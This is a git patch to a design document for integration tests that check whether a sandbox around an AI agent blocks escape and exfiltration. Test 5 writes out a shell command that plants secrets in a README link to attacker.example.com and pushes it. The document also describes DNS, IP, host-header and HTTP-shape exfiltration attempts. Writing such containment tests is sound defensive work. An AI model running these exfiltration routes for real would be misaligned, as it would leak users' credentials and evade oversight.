From 1111ced04ddfbbcfb6df43b70bc3e642be5a60f9 Mon Sep 17 00:00:00 2001 From: didericis Date: Tue, 26 May 2026 22:11:32 -0400 Subject: [PATCH] docs(prd-0022): resolve remaining open Qs All seven open questions now have decisions baked in: - Q1 (HTTP-exfil scope): authoritative. Every shape MUST block; chunk 3 expands into remediation sub-PRDs if any of path/query/header leak today. - Q3 (fake secret): multiple shapes, parameterized. Three env vars (TEST_SECRET_ANTHROPIC, _AWS, _GENERIC); test 5 loops via subTest. Resilient to gitleaks rule renames. - Q6 (missing backend): die. `get_bottle_backend()`'s current behavior surfaces clearly; surprise-skips are worse than loud failures for new-backend branches. - Q7 (tool deps): preflight check. setUpClass runs `which curl && which git && which dig`; SkipTest with the missing list catches future backends shipping thinner base images. Updated implementation chunks + test-5 sketch to match. No remaining open questions. --- .../0022-sandbox-escape-integration-test.md | 238 ++++++++++-------- 1 file changed, 128 insertions(+), 110 deletions(-) diff --git a/docs/prds/0022-sandbox-escape-integration-test.md b/docs/prds/0022-sandbox-escape-integration-test.md index 591339e..6aa39b4 100644 --- a/docs/prds/0022-sandbox-escape-integration-test.md +++ b/docs/prds/0022-sandbox-escape-integration-test.md @@ -136,10 +136,13 @@ destination outside the bottle. - The bottle declares: a few allowlisted egress routes (api.anthropic.com, etc.), a git-gate upstream pointing at a throwaway repo, supervise off (not under test) - - Plants a known `TEST_SECRET` value in the bottle's env. - The value matches a gitleaks rule (e.g., shaped like an - Anthropic API key) so the README test fires the right - pre-receive rejection. + - Plants three known secret env vars (matching three + gitleaks rules — anthropic-api-key, AWS, generic + high-entropy) so test 5 parameterizes over shapes. +- A `setUpClass` preflight that verifies `curl`, `git`, + `dig` exist in the agent container; raises + `unittest.SkipTest` listing missing tools if any are + absent (catches future backends with thinner images). - A `_run_in_agent(script)` helper that wraps `bottle.exec(script)` and returns an `ExecResult`. - Assertions per category that read the existing @@ -303,87 +306,130 @@ def test_4_dns_exfil_blocked(self): self.assertNotIn("ANSWER SECTION", result.stdout) ``` -### Attack-5: secret in README push (with ordering check) +### Attack-5: secret in README push (multi-shape, with ordering check) + +Parameterized over three secret shapes so a renamed +gitleaks rule doesn't silently let one shape through. ```python +SECRET_SHAPES = [ + ("anthropic", "$TEST_SECRET_ANTHROPIC"), + ("aws", "$TEST_SECRET_AWS"), + ("generic", "$TEST_SECRET_GENERIC"), +] + def test_5_readme_push_blocked(self): - result = self.bottle.exec( - 'cd /tmp && git init test-repo && cd test-repo && ' - 'git config user.email "test@example.com" && ' - 'git config user.name "test" && ' - 'echo "[click](https://attacker.example.com/?leak=$TEST_SECRET)" > README.md && ' - 'git add . && git commit -m "leak" && ' - 'git remote add origin ' - 'git://claude-bottle-git-gate-/throwaway.git && ' - 'git push origin master' - ) - self.assertNotEqual(0, result.returncode) - combined = (result.stderr + result.stdout).lower() - # gitleaks ran and rejected. - self.assertIn("gitleaks", combined) - # AND: the rejection happened BEFORE git-gate tried to - # forward to the unreachable upstream. Network errors - # mentioning resolve / refused / unreachable would mean - # gitleaks ran AFTER (sequence wrong) or didn't run. - for upstream_phrase in ( - "could not resolve", - "connection refused", - "network is unreachable", - "upstream", - ): - self.assertNotIn( - upstream_phrase, combined, - f"unexpected upstream-phase phrase: gitleaks should " - f"reject BEFORE git-gate attempts an upstream push", - ) + for name, env_ref in SECRET_SHAPES: + with self.subTest(secret=name): + result = self.bottle.exec( + 'cd /tmp && rm -rf test-repo && ' + 'git init test-repo && cd test-repo && ' + 'git config user.email "test@example.com" && ' + 'git config user.name "test" && ' + f'echo "[click](https://attacker.example.com/?leak={env_ref})" > README.md && ' + 'git add . && git commit -m "leak" && ' + 'git remote add origin ' + 'git://claude-bottle-git-gate-/throwaway.git && ' + 'git push origin master' + ) + self.assertNotEqual(0, result.returncode) + combined = (result.stderr + result.stdout).lower() + # gitleaks ran and rejected. + self.assertIn("gitleaks", combined) + # AND: rejection BEFORE the unreachable upstream + # was contacted — network-phase errors would + # mean gitleaks ran late or not at all. + for upstream_phrase in ( + "could not resolve", + "connection refused", + "network is unreachable", + "upstream", + ): + self.assertNotIn( + upstream_phrase, combined, + f"unexpected upstream-phase phrase for {name!r}: " + f"gitleaks should reject BEFORE git-gate " + f"attempts an upstream push", + ) ``` The `` is templated via the bottle's known identity at -fixture-time. The two-part assertion both confirms gitleaks -fired AND that it fired before any upstream attempt — the -ordering the sandbox depends on. +fixture-time. Each subTest independently: + - Confirms the rejection happened (returncode != 0) + - Confirms gitleaks fired (`"gitleaks"` in output) + - Confirms gitleaks fired BEFORE the upstream attempt + (no network-phase phrases in output) ## Implementation chunks Sized small. -1. **Fixture manifest + secret env-var plumbing.** Just the - files under `tests/integration/fixtures/sandbox-escape/` - and the test class scaffolding with `setUpClass` / - `tearDownClass` bringing up + tearing down the bottle. +1. **Fixture + scaffolding.** Files under + `tests/integration/fixtures/sandbox-escape/`, the + TestSandboxEscape class with `setUpClass` / + `tearDownClass`, the three-secret env-var fixture + (anthropic / AWS / generic shapes), and the + `setUpClass` preflight that checks for `curl`, `git`, + `dig` in the agent and SkipTests with the missing list. No attack tests yet. -2. **Attack 1 + 2 (hostname + IP).** The simplest two — - curl returns non-zero, that's the assertion. -3. **Attack 3 (HTTP exfil shapes).** Parameterized over the - four shapes via subTest. Likely surfaces gaps in current - DLP coverage for header / path / query shapes. -4. **Attack 4 (DNS exfil).** Exact-match-allowlist - verification. -5. **Attack 5 (README push via git-gate).** Hardest because - it requires the git-gate sidecar configured and the - gitleaks rule fired. The "throwaway" upstream URL is - intentionally unreachable to keep the test fully - self-contained. Ordering assertions confirm gitleaks - fires before any upstream push attempt. +2. **Attack 1 + 2 (hostname + IP).** Curl exit-code + assertions. Also covers the host-header spoof via + `curl --resolve`. +3. **Attack 3 (HTTP exfil shapes).** Parameterized over + the four shapes (path, query, body, header) via + subTest. **This chunk is authoritative** — if any shape + leaks today, the chunk expands to include the + remediation PRD work for that shape before merging. + May fan out into multiple sub-PRs (one per leaking + shape) coordinated as a chunk-3 epic. +4. **Attack 4 (DNS exfil).** Two sub-assertions: + crafted-subdomain-via-pipelock + direct + `dig @8.8.8.8` from the agent's `--internal` network. +5. **Attack 5 (README push via git-gate).** Hardest + because of the multi-secret-shape parameterization + + git-gate-must-be-up requirement + the gitleaks-ordering + assertions. The "throwaway" upstream URL is + intentionally unreachable. 6. **CI integration (best-effort).** Add a Gitea Actions job that runs the suite against the Docker backend. - Marked `continue-on-error: true` so the workflow doesn't - fail if docker-in-docker constraints prevent compose-up. - If the runner shape evolves later (e.g., privileged - Docker socket access) the suite slots in cleanly. + Marked `continue-on-error: true` so the workflow + doesn't fail if docker-in-docker constraints prevent + compose-up. If the runner shape evolves later + (privileged Docker socket access) the suite slots in + cleanly. ## Resolved questions +1. **Pipelock DLP coverage for non-body shapes.** Resolved: + **authoritative.** Every HTTP-exfil shape (path / query / + body / header) MUST block for the suite to pass. If a + shape leaks today, it's a real sandbox gap and the + remediation lands BEFORE this test merges, not after. + The project's purpose is sandbox integrity; shipping a + test that documents "we knowingly leak headers" is + worse than not shipping the test. May expand the + delivery into "this test PRD + N remediation PRDs" + depending on what attack 3 surfaces. + 2. **DNS exfil via the agent's direct DNS resolver.** Resolved: **add the assertion to test 4.** The `--internal` network has no default gateway, so a direct `dig @8.8.8.8 .example.com` from the agent - should fail. Test 4 grows a second assertion: in - addition to the crafted-subdomain-via-pipelock attempt - (which pipelock's exact-match allowlist rejects), the - agent's direct DNS query is also blocked. Both - sub-assertions must pass for test 4 to be green. + should fail. Test 4 grows a second sub-assertion + alongside the crafted-subdomain-via-pipelock check. + +3. **Realistic fake secret.** Resolved: **multiple + shapes, parameterized.** The README attack (test 5) + loops over a tuple of secret shapes — anthropic-api-key, + AWS key (AKIA...), and a generic high-entropy string — + running the push-attempt N times. Each iteration is a + subTest. Catches the case where one gitleaks rule + lapses but another still fires; also makes the test + resilient to rule renames. The fixture bottle's env + carries `TEST_SECRET_ANTHROPIC` / `TEST_SECRET_AWS` / + `TEST_SECRET_GENERIC` rather than one combined + `TEST_SECRET`. 4. **Reachability of throwaway git upstream + gitleaks ordering.** Resolved: **add ordering assertions to test 5.** @@ -397,61 +443,33 @@ Sized small. `"network is unreachable"`, or `"upstream"` — those would mean gitleaks let the push through and the failure happened later in the chain. - The second assertion is the "ordering" check — if it - fires, gitleaks ran AFTER the upstream attempt - (sequence is wrong) or didn't run at all. 5. **CI vs. local-only.** Resolved: **attempt CI; accept local-only fallback if docker-in-docker blocks it.** - The Gitea Actions runner ecosystem usually has Docker - available to the workflow but not nested Docker - compose inside a containerized runner. v1 tries: add a - CI job that runs the suite against the Docker backend - on a runner with Docker socket access. If the - compose-up step fails because of DiD constraints, the + Add a Gitea Actions job that runs the suite against the + Docker backend on a runner with Docker socket access. + If compose-up fails because of DiD constraints, the job is marked `continue-on-error: true` and the suite stays local-only until we have a runner shape that can host it. -## Open questions +6. **Backend-agnostic invocation when backend missing.** + Resolved: **die (current behavior).** `get_bottle_backend()` + already dies with a clear message naming the unknown + backend; the test surfaces that as a hard error + rather than a skip. Forces the developer to set + `CLAUDE_BOTTLE_BACKEND` to a real implementation — + surprise-skips on smolmachines branches that forgot to + set the env var are worse than a loud failure. -1. **What does today's pipelock actually do for shapes 3.1, - 3.2, 3.4?** DLP body-scanning is a known feature; URL / - path / header scanning is less clear. The test will tell - us — if a shape passes today (attack succeeds), it's a - real gap and the test fails LOUDLY rather than silently - passing. Either: - - Treat the test as authoritative: every shape MUST block - for the suite to pass. Failing shapes are real bugs. - - Treat the test as descriptive: mark the failing shapes - `expectedFailure` and resolve them in a follow-up PRD. - - Lean toward the first — the project's purpose is sandbox - integrity; documenting "we knowingly leak headers" is - worse than fixing it. But for v1 of this test it's OK to - land with `expectedFailure` markers + tickets. - -3. **Realistic fake secret.** `sk-ant-api03-...` shape is - what gitleaks's anthropic-api-key rule matches. Verify - the exact regex before settling on the fixture value; - wrong-shape secret would mean attack 5 silently passes - the wrong way (gitleaks doesn't fire, README ships). - -6. **Backend-agnostic invocation.** The suite reads - `CLAUDE_BOTTLE_BACKEND` so it runs against whatever - backend is active. For the smolmachines spike, the - developer sets that env var + runs the same test file. - No code change needed in the suite itself. Worth - verifying the existing `get_bottle_backend()` machinery - handles the backend-not-yet-implemented case gracefully - (it dies with a clear message today — confirm that's - what we want). - -7. **Test environment requirements.** The agent container - needs `curl`, `git`, `dig`. Already in today's Docker - image; need to declare these as required for any - future backend's base image too. Worth noting in the - smolmachines PRD. +7. **Test environment requirements: enforce via preflight.** + Resolved: **preflight check in `setUpClass`.** After + bringing the bottle up, run `which curl && which git + && which dig` inside the agent container; if any tool + is missing, raise `unittest.SkipTest` with the missing + list. Catches a future backend that ships a thinner + base image without producing five confusing + command-not-found failures down the suite. ## References